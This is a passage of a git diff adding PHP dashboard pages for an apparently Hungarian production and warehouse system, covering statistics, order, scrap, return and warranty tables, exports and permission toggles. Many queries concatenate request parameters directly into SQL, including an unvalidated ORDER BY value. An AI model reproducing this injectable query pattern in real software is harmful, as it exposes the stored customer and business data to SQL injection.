00:00:00' AND FROM_UNIXTIME(date_processend) <= '$to_date 23:59:59' THEN db_process_l ELSE 0 END), 0) AS db_process_l, + + COALESCE(SUM(CASE WHEN date_cleanend IS NOT NULL AND FROM_UNIXTIME(date_cleanend) >= '$from_date 00:00:00' AND FROM_UNIXTIME(date_cleanend) <= '$to_date 23:59:59' THEN db_clean_r ELSE 0 END), 0) AS db_clean_r, + COALESCE(SUM(CASE WHEN date_cleanend IS NOT NULL AND FROM_UNIXTIME(date_cleanend) >= '$from_date 00:00:00' AND FROM_UNIXTIME(date_cleanend) <= '$to_date 23:59:59' THEN db_clean_l ELSE 0 END), 0) AS db_clean_l + FROM production_classic; + "); + + $parameters = mysqli_fetch_array($sql); + + echo json_encode(["result" => "ok", "data" => $parameters]); + } else if (htmlspecialchars($_POST["func"]) == "ordersStat") { + $from_date = htmlspecialchars($_POST["from_date"]); + $to_date = htmlspecialchars($_POST["to_date"]); + $get_item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + + $query_item_id = ''; + if ($get_item_id != '') { $query_item_id = 'AND item_id LIKE "%'.$get_item_id.'%"'; } + + $sql = mysqli_query($conn,"SELECT + SUM(CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^[0-9]+$' THEN + CASE WHEN amount_type != 0 THEN amount / 2 ELSE amount END + ELSE 0 + END) AS amount_classic, + SUM(CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^CL[P|M]?[0-9]+$' THEN + CASE WHEN amount_type != 0 THEN amount / 2 ELSE amount END + ELSE 0 + END) AS amount_climair, + SUM(CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^F[0-9]{4}$' THEN + CASE WHEN amount_type != 0 THEN amount / 2 ELSE amount END + ELSE 0 + END) AS amount_sporty, + SUM(CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^FR[0-9]{4}$' THEN + CASE WHEN amount_type != 0 THEN amount / 2 ELSE amount END + ELSE 0 + END) AS amount_injmold, + SUM(CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^[0-9]+$' THEN + CASE WHEN amount_type != 0 THEN taken_out / 2 ELSE taken_out END + ELSE 0 + END) AS taken_out_classic, + SUM(CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^CL[P|M]?[0-9]+$' THEN + CASE WHEN amount_type != 0 THEN taken_out / 2 ELSE taken_out END + ELSE 0 + END) AS taken_out_climair, + SUM(CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^F[0-9]{4}$' THEN + CASE WHEN amount_type != 0 THEN taken_out / 2 ELSE taken_out END + ELSE 0 + END) AS taken_out_sporty, + SUM(CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^FR[0-9]{4}$' THEN + CASE WHEN amount_type != 0 THEN taken_out / 2 ELSE taken_out END + ELSE 0 + END) AS taken_out_injmold + FROM + warehouse_reservation + WHERE + is_active = 0 AND is_deleted = 0 $query_item_id + AND FROM_UNIXTIME(date_end) >= '$from_date 00:00:00' AND FROM_UNIXTIME(date_end) <= '$to_date 23:59:59'"); + + $parameters = mysqli_fetch_array($sql); + + echo json_encode(["result" => "ok", "data" => $parameters]); + } else if (htmlspecialchars($_POST["func"]) == "scrapTable") { + $from_date = htmlspecialchars($_POST["from_date"]); + $to_date = htmlspecialchars($_POST["to_date"]); + $get_item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + + $query_item_id = ''; + if ($get_item_id != '') { $query_item_id = 'AND item_id LIKE "%'.$get_item_id.'%"'; } + + $parameters = array(); + + $query = "SELECT * FROM scrap_removal WHERE FROM_UNIXTIME(date_create) >= '$from_date 00:00:00' AND FROM_UNIXTIME(date_create) <= '$to_date 23:59:59' $query_item_id"; + if ($result = $conn->query($query)) { + while ($c_scrap = $result->fetch_assoc()) { + + $parameters[] = [ + "date_create" => date('Y. m. d. H:i:s', $c_scrap['date_create']), + "wh_id" => $c_scrap['wh_id'], + "item_id" => $c_scrap['item_id'], + "right_db" => $c_scrap['right_db'], + "left_db" => $c_scrap['left_db'], + "reason" => $c_scrap['reason'] + ]; + + } + } + + echo json_encode(["result" => "ok", "data" => $parameters]); + } else if (htmlspecialchars($_POST["func"]) == "returnGoodsTable") { + $from_date = htmlspecialchars($_POST["from_date"]); + $to_date = htmlspecialchars($_POST["to_date"]); + $get_item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + + $query_item_id = ''; + if ($get_item_id != '') { $query_item_id = 'AND item_id LIKE "%'.$get_item_id.'%"'; } + + $parameters = array(); + + $query = "SELECT * FROM return_goods WHERE FROM_UNIXTIME(return_date) >= '$from_date 00:00:00' AND FROM_UNIXTIME(return_date) <= '$to_date 23:59:59' $query_item_id"; + if ($result = $conn->query($query)) { + while ($c_scrap = $result->fetch_assoc()) { + + $parameters[] = [ + "date_create" => date('Y. m. d.', $c_scrap['return_date']), + "name" => $c_scrap['name'], + "item_id" => $c_scrap['item_id'], + "pack_id" => $c_scrap['pack_id'], + "order_id" => $c_scrap['order_id'], + "return_reason" => $c_scrap['return_reason'], + "is_withdraw" => $c_scrap['is_withdraw'], + "cancellation_invoice" => $c_scrap['cancellation_invoice'], + "is_scrap" => $c_scrap['is_scrap'], + "is_warehoused" => $c_scrap['is_warehoused'], + "reason" => $c_scrap['reason'], + "note" => $c_scrap['note'], + "is_saved" => $c_scrap['is_saved'] == 1 ? 'igen' : 'nem' + ]; + + } + } + + echo json_encode(["result" => "ok", "data" => $parameters]); + } else if (htmlspecialchars($_POST["func"]) == "warrantyTable") { + $from_date = htmlspecialchars($_POST["from_date"]); + $to_date = htmlspecialchars($_POST["to_date"]); + $get_item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + + $query_item_id = ''; + if ($get_item_id != '') { $query_item_id = 'AND item_id LIKE "%'.$get_item_id.'%"'; } + + $parameters = array(); + + $query = "SELECT * FROM warranty_removal WHERE FROM_UNIXTIME(date_create) >= '$from_date 00:00:00' AND FROM_UNIXTIME(date_create) <= '$to_date 23:59:59' $query_item_id"; + if ($result = $conn->query($query)) { + while ($c_scrap = $result->fetch_assoc()) { + + $parameters[] = [ + "date_create" => date('Y. m. d. H:i:s', $c_scrap['date_create']), + "name" => $c_scrap['name'], + "mail" => $c_scrap['mail'], + "order_id" => $c_scrap['order_id'], + "item_id" => $c_scrap['item_id'], + "right_db" => $c_scrap['right_db'], + "left_db" => $c_scrap['left_db'], + "reason" => $c_scrap['reason'], + "note" => $c_scrap['note'] + ]; + + } + } + + echo json_encode(["result" => "ok", "data" => $parameters]); + } else if (htmlspecialchars($_POST["func"]) == "OpenSettings") { + + $keys = ['plexi_price', 'granules_price', 'kwh_price']; + $placeholders = implode(',', array_fill(0, count($keys), '?')); + + $stmt = $conn->prepare("SELECT param_key, param_value FROM system_params WHERE param_key IN ($placeholders)"); + $stmt->bind_param(str_repeat('s', count($keys)), ...$keys); + $stmt->execute(); + $result = $stmt->get_result(); + + $params = []; + while ($row = $result->fetch_assoc()) { + $params[$row['param_key']] = $row['param_value']; + } + + echo json_encode([ + 'plexi_price' => $params['plexi_price'], + 'granules_price' => $params['granules_price'], + 'kwh_price' => $params['kwh_price'], + 'result' => 'ok' + ]); + } else if (htmlspecialchars($_POST["func"]) == "SaveSettings") { + $params = [ + 'plexi_price' => htmlspecialchars($_POST["plexi_price"]), + 'granules_price' => htmlspecialchars($_POST["granules_price"]), + 'kwh_price' => htmlspecialchars($_POST["kwh_price"]) + ]; + + $stmt = $conn->prepare("UPDATE system_params SET param_value = ? WHERE param_key = ?"); + + foreach ($params as $key => $value) { + $stmt->bind_param('ss', $value, $key); + $stmt->execute(); + } + $stmt->close(); + + echo json_encode(['result' => 'ok']); + } else if (htmlspecialchars($_POST["func"]) == "ExportGenerator") { + $from_date = htmlspecialchars($_POST["from_date"]); + $to_date = htmlspecialchars($_POST["to_date"]); + $type = htmlspecialchars($_POST["type"]); + + $get_item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + + $query_item_id = ''; + if ($get_item_id != '') { $query_item_id = 'AND item_id LIKE "%'.$get_item_id.'%"'; } + + $parameters = array(); + + if ($type == 'classic') { + $parameters[] = [ + "item_id" => "Cikkszám", "db_start" => "Mennyiség", "date_start" => "Gyártásba került", "date_prep" => "Szerszám elők.", + "date_prepend" => "Szerszám elők. STOP", "remain_r" => "Maradék j", "remain_l" => "Maradék b", "ordered" => "Megrendelve", + "tablesize_x" => "Táblaméret x", "tablesize_y" => "Táblaméret y", "date_cut" => "Terítékfelvágás", "date_cutend" => "Terítékfelvágás STOP", + "db_cut_r" => "Felvágott j", "db_cut_l" => "Felvágott b", "date_press" => "Préslégformázás", "date_pressend" => "Préslégformázás STOP", + "db_press_r" => "Préslégformázott j", "db_press_l" => "Préslégformázott b", "press_machine" => "Présgép", "date_process" => "Feldolgozás", + "date_processend" => "Feldolgozás STOP", "db_process_r" => "Feldolgozott j", "db_process_l" => "Feldolgozott b", "process_mode" => "Feldolgozás módja", + "date_clean" => "Tisztítás", "date_cleanend" => "Tisztítás STOP", "db_clean_r" => "Tisztított j", "db_clean_l" => "Tisztított b", + "date_warehouseend" => "Raktározás / Gyártás lezárva", "db_revenue_bulk_r" => "Raktározva j", "db_revenue_bulk_l" => "Raktározva b", "db_table" => "Táblamennyiség" + ]; + + $query = "SELECT * FROM production_classic WHERE FROM_UNIXTIME(date_revenue) >= '$from_date 00:00:00' AND FROM_UNIXTIME(date_revenue) <= '$to_date 23:59:59' AND stage = 0 $query_item_id"; + if ($result = $conn->query($query)) { + while ($c_export = $result->fetch_assoc()) { + + $parameters[] = [ + "item_id" => $c_export['item_id'], + "db_start" => $c_export['db_start'], + "date_start" => date('Y. m. d. H:i:s', $c_export['date_start']), + "date_prep" => date('Y. m. d. H:i:s', $c_export['date_prep']), + "date_prepend" => date('Y. m. d. H:i:s', $c_export['date_prepend']), + "remain_r" => $c_export['remain_r'], + "remain_l" => $c_export['remain_l'], + "ordered" => date('Y. m. d. H:i:s', $c_export['ordered']), + "tablesize_x" => $c_export['tablesize_x'], + "tablesize_y" => $c_export['tablesize_y'], + "db_table" => $c_export['db_table'], + "date_cut" => date('Y. m. d. H:i:s', $c_export['date_cut']), + "date_cutend" => date('Y. m. d. H:i:s', $c_export['date_cutend']), + "db_cut_r" => $c_export['db_cut_r'], + "db_cut_l" => $c_export['db_cut_l'], + "date_press" => date('Y. m. d. H:i:s', $c_export['date_press']), + "date_pressend" => date('Y. m. d. H:i:s', $c_export['date_pressend']), + "db_press_r" => $c_export['db_press_r'], + "db_press_l" => $c_export['db_press_l'], + "press_machine" => $c_export['press_machine'], + "date_process" => date('Y. m. d. H:i:s', $c_export['date_process']), + "date_processend" => date('Y. m. d. H:i:s', $c_export['date_processend']), + "db_process_r" => $c_export['db_process_r'], + "db_process_l" => $c_export['db_process_l'], + "process_mode" => $c_export['process_mode'], + "date_clean" => date('Y. m. d. H:i:s', $c_export['date_clean']), + "date_cleanend" => date('Y. m. d. H:i:s', $c_export['date_cleanend']), + "db_clean_r" => $c_export['db_clean_r'], + "db_clean_l" => $c_export['db_clean_l'], + "date_warehouseend" => date('Y. m. d. H:i:s', $c_export['date_warehouseend']), + "db_revenue_bulk_r" => $c_export['db_revenue_bulk_r'], + "db_revenue_bulk_l" => $c_export['db_revenue_bulk_l'] + ]; + + } + } + } else if ($type == 'sporty') { + $parameters[] = [ + "item_id" => "Cikkszám", "db_start" => "Mennyiség", "date_start" => "Gyártásba került", "remain_r" => "Maradék j", + "remain_l" => "Maradék b", "ordered" => "Megrendelve", "tablesize_x" => "Táblaméret x", "tablesize_y" => "Táblaméret y", + "db_table" => "Táblamennyiség", "date_cut" => "Terítékfelvágás", "date_cutend" => "Terítékfelvágás STOP", "db_cut_r" => "Felvágott j", + "db_cut_l" => "Felvágott b", "date_press" => "Préselés", "date_pressend" => "Préselés STOP", "db_press_r" => "Préselt j", + "db_press_l" => "Préselt b", "date_warehouseend" => "Raktározás / Gyártás lezárva", "db_revenue_bulk_r" => "Raktározva j", "db_revenue_bulk_l" => "Raktározva b" + ]; + + $query = "SELECT * FROM production_sporty WHERE FROM_UNIXTIME(date_revenue) >= '$from_date 00:00:00' AND FROM_UNIXTIME(date_revenue) <= '$to_date 23:59:59' AND stage = 0 $query_item_id"; + if ($result = $conn->query($query)) { + while ($c_export = $result->fetch_assoc()) { + + $parameters[] = [ + "item_id" => $c_export['item_id'], + "db_start" => $c_export['db_start'], + "date_start" => date('Y. m. d. H:i:s', $c_export['date_start']), + "remain_r" => $c_export['remain_r'], + "remain_l" => $c_export['remain_l'], + "ordered" => date('Y. m. d. H:i:s', $c_export['ordered']), + "tablesize_x" => $c_export['tablesize_x'], + "tablesize_y" => $c_export['tablesize_y'], + "db_table" => $c_export['db_table'], + "date_cut" => date('Y. m. d. H:i:s', $c_export['date_cut']), + "date_cutend" => date('Y. m. d. H:i:s', $c_export['date_cutend']), + "db_cut_r" => $c_export['db_cut_r'], + "db_cut_l" => $c_export['db_cut_l'], + "date_press" => date('Y. m. d. H:i:s', $c_export['date_press']), + "date_pressend" => date('Y. m. d. H:i:s', $c_export['date_pressend']), + "db_press_r" => $c_export['db_press_r'], + "db_press_l" => $c_export['db_press_l'], + "date_warehouseend" => date('Y. m. d. H:i:s', $c_export['date_warehouseend']), + "db_revenue_bulk_r" => $c_export['db_revenue_bulk_r'], + "db_revenue_bulk_l" => $c_export['db_revenue_bulk_l'] + ]; + + } + } + } else if ($type == 'injmold') { + $parameters[] = [ + "item_id" => "Cikkszám", "db_start" => "Mennyiség", "date_start" => "Gyártásba került", "date_prep" => "Szerszám elők.", + "date_prepend" => "Szerszám elők. STOP", "ordered" => "Megrendelve", "db_granules" => "Rendelt granulátum", "date_process" => "Fröccsöntés", + "date_processend" => "Fröccsöntés STOP", "db_process_r" => "Fröccsöntött j", "db_process_l" => "Fröccsöntött b", "db_granules_used" => "Használt anyag", + "kwh_start" => "Villanyóra start", "kwh_stop" => "Villanyóra stop", "date_clean" => "Utómunka", "date_cleanend" => "Utómunka STOP", + "db_clean_r" => "Utómunka j", "db_clean_l" => "Utómunka b", "date_warehouseend" => "Raktározás / Gyártás lezárva", "db_revenue_bulk_r" => "Raktározva j", + "db_revenue_bulk_l" => "Raktározva b" + ]; + + $query = "SELECT * FROM production_injmold WHERE FROM_UNIXTIME(date_revenue) >= '$from_date 00:00:00' AND FROM_UNIXTIME(date_revenue) <= '$to_date 23:59:59' AND stage = 0 $query_item_id"; + if ($result = $conn->query($query)) { + while ($c_export = $result->fetch_assoc()) { + + $parameters[] = [ + "item_id" => $c_export['item_id'], + "db_start" => $c_export['db_start'], + "date_start" => date('Y. m. d. H:i:s', $c_export['date_start']), + "date_prep" => date('Y. m. d. H:i:s', $c_export['date_prep']), + "date_prepend" => date('Y. m. d. H:i:s', $c_export['date_prepend']), + "ordered" => date('Y. m. d. H:i:s', $c_export['ordered']), + "db_granules" => $c_export['db_granules'], + "date_process" => date('Y. m. d. H:i:s', $c_export['date_process']), + "date_processend" => date('Y. m. d. H:i:s', $c_export['date_processend']), + "db_process_r" => $c_export['db_process_r'], + "db_process_l" => $c_export['db_process_l'], + "db_granules_used" => $c_export['db_granules_used'], + "kwh_start" => $c_export['kwh_start'], + "kwh_stop" => $c_export['kwh_stop'], + "date_clean" => date('Y. m. d. H:i:s', $c_export['date_clean']), + "date_cleanend" => date('Y. m. d. H:i:s', $c_export['date_cleanend']), + "db_clean_r" => $c_export['db_clean_r'], + "db_clean_l" => $c_export['db_clean_l'], + "date_warehouseend" => date('Y. m. d. H:i:s', $c_export['date_warehouseend']), + "db_revenue_bulk_r" => $c_export['db_revenue_bulk_r'], + "db_revenue_bulk_l" => $c_export['db_revenue_bulk_l'] + ]; + + } + } + } else if ($type == 'boxing') { + $parameters[] = [ + "item_id" => 'Cikkszám', "db_start" => 'Mennyiség', "date_start" => 'Dobozolásra került', + "date_warehouseend" => 'Raktározás / Dobozolás lezárva', "db_revenue" => 'Raktározva' + ]; + + $query = "SELECT * FROM production_boxing WHERE FROM_UNIXTIME(date_warehouseend) >= '$from_date 00:00:00' AND FROM_UNIXTIME(date_warehouseend) <= '$to_date 23:59:59' AND stage = 0 $query_item_id"; + if ($result = $conn->query($query)) { + while ($c_export = $result->fetch_assoc()) { + + $parameters[] = [ + "item_id" => $c_export['item_id'], + "db_start" => $c_export['db_start'], + "date_start" => date('Y. m. d. H:i:s', $c_export['date_start']), + "date_warehouseend" => date('Y. m. d. H:i:s', $c_export['date_warehouseend']), + "db_revenue" => $c_export['db_revenue'] + ]; + + } + } + } else if ($type == 'orders') { + $parameters[] = [ + "item_id" => "Cikkszám", "amount" => "Mennyiség db", "reason" => "Rendelés neve / indoklás", "date_create" => "Létrehozva", + "taken_out" => "Kiszedve db", "order_id" => "Rendelés azonosító", "order_name" => "Rendelő neve", "order_mail" => "Rendelő email-címe", + "receipt_method" => "Átvételi mód", "note" => "Megjegyzés", "primary_source" => "Elsődleges forrás", "amount_type" => "Mennyiség fajtája", + "primary_warehouse" => "Elsődleges raktár", "date_end" => "Lezárva", "is_deleted" => "Törölt rendelés", "customer_type" => "Vevőtípus", + ]; + + $query = "SELECT * FROM warehouse_reservation WHERE FROM_UNIXTIME(date_create) >= '$from_date 00:00:00' AND FROM_UNIXTIME(date_create) <= '$to_date 23:59:59' AND is_active = 0 $query_item_id"; + if ($result = $conn->query($query)) { + while ($c_export = $result->fetch_assoc()) { + + $amount_type = 'pár'; + if ($c_export['amount_type'] == "1") { + $amount_type = 'jobb'; + } else if ($c_export['amount_type'] == "2") { + $amount_type = 'bal'; + } + + $parameters[] = [ + "item_id" => $c_export['item_id'], + "amount" => $c_export['amount'], + "reason" => $c_export['reason'], + "date_create" => date('Y. m. d. H:i:s', $c_export['date_create']), + "taken_out" => $c_export['taken_out'], + "order_id" => $c_export['order_id'], + "order_name" => $c_export['order_name'], + "order_mail" => $c_export['order_mail'], + "customer_type" => $c_export['customer_type'], + "receipt_method" => $c_export['receipt_method'], + "note" => $c_export['note'], + "primary_source" => $c_export['primary_source'] == 1 ? 'fóliás' : 'dobozos', + "amount_type" => $amount_type, + "primary_warehouse" => $c_export['primary_warehouse'], + "date_end" => date('Y. m. d. H:i:s', $c_export['date_end']), + "is_deleted" => $c_export['is_deleted'] == 1 ? 'igen' : 'nem' + ]; + + } + } + } + + echo json_encode(["result" => "ok", "data" => $parameters]); + } + + exit(); +} + +/* Ár lekérés */ +$keys = ['plexi_price', 'granules_price', 'kwh_price']; +$placeholders = implode(',', array_fill(0, count($keys), '?')); + +$stmt = $conn->prepare("SELECT param_key, param_value FROM system_params WHERE param_key IN ($placeholders)"); +$stmt->bind_param(str_repeat('s', count($keys)), ...$keys); +$stmt->execute(); +$result = $stmt->get_result(); + +$PriceParams = []; +while ($row = $result->fetch_assoc()) { + $PriceParams[$row['param_key']] = $row['param_value']; +} + +?> + + + + + + + + Kezelőfelület + + + + +
    +
    +

    Title

    +
    +
    +
    +
    +
    +
    +
    +
    +
    + + + +
    +
    +

    Statisztika

    +
    + + + + +
    +
    + +
    +
    + + + + + + +
    + + +
    + + +
    + + + + + +
    +
    +

    Összesített Gyártási Adatok

    +
    + Összes gyártott darab + - +
    +
    + Összes selejt + - +
    +
    + Átlagos selejt % + - +
    +
    + Teljes anyagköltség + - +
    +
    + +
    +
    +
    + +

    Classic

    +
    + Felvágott + - +
    +
    + Préselt + - +
    +
    + Feldolgozott + - +
    +
    + Tisztított + - +
    +
    + Raktározott + - +
    +
    + Selejt + - +
    +
    + Alapanyag + - +
    +
    + Anyagköltség + - +
    +
    + +
    +
    + +

    Sporty

    +
    + Felvágott + - +
    +
    + Préselt + - +
    +
    + Raktározott + - +
    +
    + Selejt + - +
    +
    + Alapanyag + - +
    +
    + Anyagköltség + - +
    +
    + +
    +
    + +

    Fröccsöntött

    +
    + Fröccsöntött + - +
    +
    + Tisztított + - +
    +
    + Raktározott + - +
    +
    + Selejt + - +
    +
    + Granulátum + - +
    +
    + Anyagköltség + - +
    +
    + Áram + - +
    +
    + Áramköltség + - +
    +
    +
    + +
    +
    +

    Lezárt munkafolyamatok - Classic

    +
    +
    +
    Felvágott
    +
    -
    +
    +
    +
    Préselt
    +
    -
    +
    +
    +
    Feldolgozott
    +
    -
    +
    +
    +
    Tisztított
    +
    -
    +
    +
    +
    + +
    +
    +

    Időbontás - Classic

    +
    +
    +
    Átlag szerszám előkészítés
    +
    -
    +
    +
    +
    Átlag terítékfelvágás
    +
    -
    +
    +
    +
    Átlag préslégformázás
    +
    -
    +
    +
    +
    Átlag feldolgozás
    +
    -
    +
    +
    +
    Átlag tisztítás
    +
    -
    +
    +
    +
    Átlagosan összesen
    +
    -
    +
    +
    + +
    + +
    +
    +
    Összesen szerszám előkészítés
    +
    -
    +
    +
    +
    Összesen terítékfelvágás
    +
    -
    +
    +
    +
    Összesen préslégformázás
    +
    -
    +
    +
    +
    Összesen feldolgozás
    +
    -
    +
    +
    +
    Összesen tisztítás
    +
    -
    +
    +
    +
    Összesen
    +
    -
    +
    +
    +
    + +
    +
    +

    Időbontás - Sporty

    +
    +
    +
    Átlag terítékfelvágás
    +
    -
    +
    +
    +
    Átlag préselés
    +
    -
    +
    +
    +
    Átlagosan összesen
    +
    -
    +
    +
    + +
    + +
    +
    +
    Összesen terítékfelvágás
    +
    -
    +
    +
    +
    Összesen préselés
    +
    -
    +
    +
    +
    Összesen
    +
    -
    +
    +
    +
    + +
    +
    +

    Időbontás - Fröccsöntött

    +
    +
    +
    Átlag szerszám előkészítés
    +
    -
    +
    +
    +
    Átlag fröccsöntés
    +
    -
    +
    +
    +
    Átlag utómunka
    +
    -
    +
    +
    +
    Átlagosan összesen
    +
    -
    +
    +
    + +
    + +
    +
    +
    Összesen szerszám előkészítés
    +
    -
    +
    +
    +
    Összesen fröccsöntés
    +
    -
    +
    +
    +
    Összesen utómunka
    +
    -
    +
    +
    +
    ősszesen
    +
    -
    +
    +
    +
    + +
    +
    +

    Selejt Összehasonlítás

    +
    +
    +
    Classic
    +
    +
    4.6%
    +
    +
    +
    +
    Sporty
    +
    +
    3.1%
    +
    +
    +
    +
    Fröccsöntött
    +
    +
    2.4%
    +
    +
    +
    +
    +
    + + +
    +
    +
    +
    +

    Classic Dobozolás

    +
    + Raktárra helyezett + - +
    +
    + Dobozolási átlagidő + - +
    +
    + Dobozolási összidő + - +
    +
    + +
    +
    +

    Sporty Dobozolás

    +
    + Raktárra helyezett + - +
    +
    + Dobozolási átlagidő + - +
    +
    + Dobozolási összidő + - +
    +
    + +
    +
    +

    Fröccsöntött Dobozolás

    +
    + Raktárra helyezett + - +
    +
    + Dobozolási átlagidő + - +
    +
    + Dobozolási összidő + - +
    +
    +
    + +
    +
    + +

    Adatok letöltése

    +
    + Excel export + Letöltés +
    +
    +
    + + +
    +
    +
    +
    +

    Classic Rendelések

    +
    + Rendelt pár + - +
    +
    + Teljesített + - +
    +
    + Teljesített % + - +
    +
    + +
    +
    +

    Sporty Rendelések

    +
    + Rendelt pár + - +
    +
    + Teljesített + - +
    +
    + Teljesített % + - +
    +
    + +
    +
    +

    Fröccsöntött Rendelések

    +
    + Rendelt pár + - +
    +
    + Teljesített + - +
    +
    + Teljesített % + - +
    +
    + +
    +
    +

    ClimAir Rendelések

    +
    + Rendelt pár + - +
    +
    + Teljesített + - +
    +
    + Teljesített % + - +
    +
    +
    + +
    +
    + +

    Adatok letöltése

    +
    + Excel export + Letöltés +
    +
    +
    + + +
    +
    +
    + +
    +

    Selejt Kivét Lista

    +
    + + + + + + + + + + + + + +
    DátumRaktárhelyCikkszámJobb oldalBal oldalSelejt oka
    +
    +
    + + +
    +
    +
    + +
    +

    Visszáru Lista

    +
    + + + + + + + + + + + + + + + + + + + + +
    DátumNévCikkszámCsomagszámRendelés számVisszaküldés okaElállási nyilatkozatSztornó számla készültSelejtVisszaraktam polcra és bevételeztemElállás okaMegjegyzésLezárva
    +
    +
    + + +
    +
    +
    + +
    +

    Garanciális Lista

    +
    + + + + + + + + + + + + + + + + +
    DátumÜgyfél neveEmailRendelés azonosítóCikkszámJobb oldalBal oldalKivét okaMegjegyzés
    +
    +
    +
    + + +


    + + +
    + + + + + diff --git a/dashboard/permlist.php b/dashboard/permlist.php new file mode 100644 index 0000000..5ae0a84 --- /dev/null +++ b/dashboard/permlist.php @@ -0,0 +1,183 @@ + 'A "perm_read" jogosultság nem állítható!' + )); + + echo $json; + } else if ($status == 1 || $status == 0) { + $sql = mysqli_query($conn,"UPDATE perm_database SET perm_status=$status WHERE perm_id = '$perm_id'"); + + $json = json_encode(array( + 'result' => 'ok' + )); + + echo $json; + } else { + $json = json_encode(array( + 'result' => 'Hibás státusz kód! Próbálja újra!' + )); + + echo $json; + } + } + + exit(); +} + +$permlist = array(); + +$query = "SELECT * FROM perm_database WHERE perm_status != 2 ORDER BY perm_category ASC"; +if ($result = $conn->query($query)) { + while ($cperm = $result->fetch_assoc()) { + + $desc = $coderclass->decode($cperm['perm_desc'], 'H3AH'); + $name = $coderclass->decode($cperm['short_name'], 'HA98'); + array_push($permlist, $cperm['perm_category']."|".$cperm['risk_factor']."|".$desc."|".$cperm['perm_id']."|".$cperm['perm_status']."|".$name); + + } +} + +sort($permlist); +$printedCat = array(); + +$printingTable = ''; + +for ($i=0; $i < count($permlist); $i++) { + $TempArr = explode("|", $permlist[$i]); + + if (!in_array($TempArr[0], $printedCat)) { + array_push($printedCat, $TempArr[0]); + $printingTable .= "".$TempArr[0].""; + } + + if ($TempArr[3] != "perm_read") { + $status = " +
    +

    Gyártási típus:

    + +
    +

    Gyártás stádiuma:

    + +
    +

    Oldalanként:

    + +
    +

    :

    + +
    + + +
    +
    +
    + +
    + +
    Előkészítés
    +
    Szerszám előkészítése
    +
    Terítékfelvágás
    +
    Préselés
    +
    Feldolgozás
    +
    Utómunka
    +
    Raktározás
    + +
    + +
    +
    +

    <    0 / 0    >

    +
    + +
    + +
    +
    +

    Lezárt gyártási folyamatok áttekintése

    +
    + +
    +
    +

    Cikkszám:

    + +
    +

    Gyártási típus:

    + +
    +

    Bevét időtartam kezdet:

    + +
    +

    Bevét időtartam vége:

    + +
    +

    Oldalanként:

    + +
    +

    :

    + +
    +
    + +
    +
    +
    + +
    +
    + + + + + + + + + + + + +
    CikkszámKezdési dátumBevételezési dátumLegyártott darabszám Jobb + BalAdatlap
    +
    +
    + +
    +
    +

    <    0 / 0    >

    +
    + +
    + +


    + + + + + + + + diff --git a/dashboard/productionstat.php b/dashboard/productionstat.php new file mode 100644 index 0000000..98f8a4e --- /dev/null +++ b/dashboard/productionstat.php @@ -0,0 +1,1162 @@ +25 db / oldal + + + + + "; + $perpageselect = str_replace("value='".$maxperpage."'", "value='".$maxperpage."' selected", $perpageselect); + + $json = json_encode(array( + 'perpage' => $perpageselect, + 'result' => 'ok' + )); + + echo $json; + + } else if (htmlspecialchars($_POST["func"]) == "table") { + $maxperpage = intval(htmlspecialchars($_POST["perpage"])); + $cpage = intval(htmlspecialchars($_POST["cpage"])); + + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $score = htmlspecialchars($_POST["score"]); + $under_production = htmlspecialchars($_POST["under_production"]); + $under_boxing = htmlspecialchars($_POST["under_boxing"]); + + $addquery = ""; + $isfirst = true; + + if ($cpage == 0) { + $cpage = 1; + } + setcookie("maxperpage", $maxperpage, time() + (86400 * 90), "/"); + + if ($item_id != "") { + $addquery = $addquery." WHERE item_id LIKE '%".$item_id."%'"; + $isfirst = false; + } + + if ($under_production == "1") { + if ($isfirst) { + $addquery = $addquery." WHERE under_production = '0'"; + $isfirst = false; + } else { + $addquery = $addquery." and under_production = '0'"; + } + } + + if ($under_boxing == "1") { + if ($isfirst) { + $addquery = $addquery." WHERE under_boxing = '0'"; + $isfirst = false; + } else { + $addquery = $addquery." and under_boxing = '0'"; + } + } + + if ($score != "") { + if ($isfirst && $score == "priority_score") { + $addquery = $addquery." WHERE priority_score IS NOT NULL"; + } else if ($score == "priority_score") { + $addquery = $addquery." and priority_score IS NOT NULL"; + } else if ($isfirst && $score == "boxing_score") { + $addquery = $addquery." WHERE boxing_score IS NOT NULL"; + } else if ($score == "boxing_score") { + $addquery = $addquery." and boxing_score IS NOT NULL"; + } + + $addquery = $addquery." ORDER BY ".$score; + $isfirst = false; + } + + $sql = mysqli_query($conn,"SELECT COUNT(*) FROM statistics_daily".$addquery); + $count = mysqli_fetch_array($sql)[0]; + + $maxpage = ceil($count / $maxperpage); + if (!($cpage >= 1 && $cpage <= $maxpage)) { + $cpage = 1; + } + + $limit = ($cpage - 1) * $maxperpage; + + $sql = mysqli_query($conn,"SELECT param_value FROM system_params WHERE param_key = 'inventory_alert'"); + $inventory_alert = intval(mysqli_fetch_array($sql)[0]); + + $sql = mysqli_query($conn,"SELECT param_value FROM system_params WHERE param_key = 'box_alert'"); + $box_alert = intval(mysqli_fetch_array($sql)[0]); + + $responseStr = ''; + $query = "SELECT * FROM statistics_daily".$addquery." LIMIT $limit, $maxperpage"; + if ($result = $conn->query($query)) { + while ($statistics_daily = $result->fetch_assoc()) { + + if ($responseStr != "") { + $responseStr .= "|%|"; + } + + $sql = mysqli_query($conn,"SELECT total_consumption FROM statistics_annual WHERE item_id = '" . $statistics_daily['item_id'] . "' ORDER BY year DESC LIMIT 1"); + $av_prod_sql = mysqli_fetch_array($sql); + $av_prod = "N/A"; + $is_new = "0"; + if ($av_prod_sql != null) { + if ($av_prod_sql[0] != 0) { + $av_prod = $av_prod_sql[0]; + } + } else { + $sql = mysqli_query($conn,"SELECT data_status FROM pr_parameters WHERE item_id = '" 